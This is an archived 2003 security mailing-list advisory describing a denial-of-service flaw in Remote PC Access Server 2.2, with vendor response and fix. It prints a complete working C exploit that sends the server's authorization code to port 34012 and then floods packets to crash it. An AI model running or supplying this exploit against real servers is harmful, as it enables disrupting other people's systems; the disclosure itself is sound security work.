[NT] Remote PC Access Server DoS Attack Vulnerability

From: SecuriTeam (support_at_securiteam.com)
Date: 05/30/03

  • Next message: SecuriTeam: "[NT] Flaw in ISAPI Extension for Windows Media Services Could Cause Denial of Service"
    To: list@securiteam.com
    Date: 30 May 2003 00:05:58 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    In the US?

    Contact Beyond Security at our new California office
    housewarming rates on automated network vulnerability
    scanning. We also welcome ISPs and other resellers!

    Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
    - - - - - - - - -

      Remote PC Access Server DoS Attack Vulnerability
    ------------------------------------------------------------------------

    SUMMARY

    Remote PC Access is "fast, compact software for accessing and controlling
    any computer from any computer on the Internet or on local area networks
    (LAN). View the remote PC's screen, control its keyboard, and mouse just
    as if you were sitting in front of it. The software transparently works
    through firewalls and routers, and has support for dynamic IP addresses.
    There is also an option to connect to a remote computer by its nickname
    instead of its IP address". A vulnerability in the product allows
    attackers to cause the product to stop responding by sending it malformed
    packets.

    DETAILS

    Vulnerable systems:
     * Remote PC Access Server version 2.2

    Immune systems:
     * Remote PC Access Server version 3.1

    How the vulnerability can be exploited?
    Remote PC Access Server using authorization code, in order to verify if
    Remote PC Access Client has been connected to the local server. The
    authorization code is 12 bytes long filled with the next bytes order:

    Authorization Code (Hex): 27 00 00 00 04 00 00 00 00 00 00 00 = 12 Bytes

    The attacker can build a spoofed client program and use DoS attack, in
    order to crash the remote server or remote system. If a local client sends
    authorization code to remote server, the remote server sends
    acknowledgment code back to the local client, after this process, by
    sending any types of packets you can cause the local client to overflow
    the remote server.

    Solution:
    A new version of Remote PC Access Server (version 3.1) has been released:
    <http://www.access-remote-pc.com/download/rpcsetup.exe>
    http://www.access-remote-pc.com/download/rpcsetup.exe

    Vendor Response:
    "Your report suggests that the server part of our software can be crashed
    by abusing the communication protocol employed between client and server
    (namely DoS attack). We are aware of this problem and it affects only a
    few places inside the source code. We are releasing a new version in a
    week or two which doesn't have this security vulnerability." (Sergey
    Stoma)

    Exploit:
    /*****************************************************************************
    ------------------------------------------------------------------------------
     Remote PC Server Version 2.2 - Vulnerability Check (Source Version)
     Copyright (c) 2003 Yaron Tal. All Rights Reserved.
    ------------------------------------------------------------------------------
    ** Overview
    ******************************************************************

        Remote PC Access Server using authorization code, in order to verify
        if Remote PC Access Client has been connected to the local server.
        The authorization code is 12 bytes long filled with the next bytes
    order:

        Authorization Code (Hex): 27 00 00 00 04 00 00 00 00 00 00 00 = 12
    Bytes

        The attacker can build a spoofed client program and use DoS attack,
        in order to crash the remote server or remote system. If a local
    client
        sends authorization code to remote server, the remote server sends
        acknowledgment code back to the local client, after this process,
        by sending any types of packets, the local client
        overflows the remote server.

    ** Terms OF Services
    *********************************************************

    You may not use, copy, modify, decompile, disassemble, emulate, clone
    rent, lease, sell otherwise reverse engineer, or transfer this program or
    any subset of this program, any such unauthorized use shall result
    immediate and automatic termination of this license and may result in
    criminal and/or civil prosecution.

    Yaron Tal is not responsible for any special, incidental, indirect or
    consequential damages that may happen when you use this program. This
    program can crash remote server or system.

    *****************************************************************************
        - Website: www.ytech.co.il \ Email: yarontal@ytech.co.il
        - Copyright (C) 2003 Yaron Tal. All Rights Reserved.
    *****************************************************************************/

    #include <stdio.h>
    #include <conio.h>
    #include <string.h>
    #include <winsock.h>

    #define WVERSION MAKEWORD(2,2)

    void main(int argc, char *argv[])
    {

        SOCKET wSocket;
        WSADATA wsaData;
        SOCKADDR_IN wAddress;
        char Ch = 0, Msg[256];

        unsigned char Packet[] = "\x27\x00\x00\x00" //
                                 "\x04\x00\x00\x00" // Authorization Code
                                 "\x00\x00\x00"; //

        printf("\nRemote PC Server Version 2.2 - Vulnerability Check (Source
    Version)\n");
        printf("Copyright (C) 2003 Yaron Tal. All Rights Reserved.\n\n");
        printf("Usage: <%s> <Remote IP Address>\n",argv[0]);

        if (argc < 2) exit(1);

        if (WSAStartup(WVERSION, &wsaData))
        {
            printf("- Error: WSAStartup.\n (%d)", GetLastError());
            exit(1);
        }

        memset(&wAddress, 0, sizeof(wAddress));
        wSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

        wAddress.sin_family = AF_INET;
        wAddress.sin_addr.s_addr = inet_addr(argv[1]);
        wAddress.sin_port = htons(34012);

        if (wSocket == INVALID_SOCKET)
        {
            printf("Error: socket() (%d)\n", GetLastError());
            exit(1);
        }

        if (connect(wSocket,(LPSOCKADDR)&wAddress,sizeof(struct sockaddr)) ==
    SOCKET_ERROR)
        {
            printf("Error: listen() (%d)\n", GetLastError());
            exit(1);
        }

        printf("Connected To Remote Host...\n");
        printf("Sending Data...\n\n");

        if (send(wSocket, Packet, sizeof(Packet),0) == SOCKET_ERROR)
        {
            printf("- Error: send() (%d)\n", GetLastError());
            exit(1);
        }

        printf("Press ESC to disconnect and exit program.");
      
        while (Ch !=27)
        {

            if (kbhit()) Ch = getch();

            memset(Msg, 0, sizeof(Msg));
            if (recv(wSocket, Msg, strlen(Msg),0) == SOCKET_ERROR)
            {
                printf("Error: recv() (%d)\n", GetLastError());
                exit(1);
            }

            if (send(wSocket, Msg, sizeof(Msg),0) == SOCKET_ERROR)
            {
                printf("- Error: send() (%d)\n", GetLastError());
                exit(1);
            }

        }

        closesocket(wSocket);
        WSACleanup();

    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:yarontal@ytech.co.il> Yaron
    Tal.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] Flaw in ISAPI Extension for Windows Media Services Could Cause Denial of Service"

    Relevant Pages

    • Re: Security? Right.
      ... Microsoft may want to be serious about security, ... > But placing it in the ResKit as a remote admin tool, ... > Microsoft MVP (Windows Security) ... >> Remote.exe Client to connect to your remote server. ...
      (microsoft.public.security)
    • Re: DomainLocalServer$ is not a valid user
      ... I have traced by SQL-profiler on remote computer. ... it's always traced the user account. ... Its Security is ... to use the current user credential to logon to the remote server. ...
      (microsoft.public.sqlserver.security)
    • Security? Right.
      ... Security Vision and Framework ... "Promoting more secure deployment and management of our software." ... Remote Limitations ... Remote.exe Client to connect to your remote server. ...
      (microsoft.public.security)
    • Registering a Remote Server With Client Tool
      ... A user at a workstation running the Personal Edition (client tools only) ... register using the sa account & password, ... This Windows user was already defined a a valid trusted login in the remote ... remote server, there is a box checked that reads "Allow other SQL Servers to ...
      (microsoft.public.sqlserver.security)
    • Re: Newbie: 2DCs error 4004
      ... On the remote server, DNS is not configured. ... On the remote server it shows under forward lookup zone: ...
      (microsoft.public.windows.server.dns)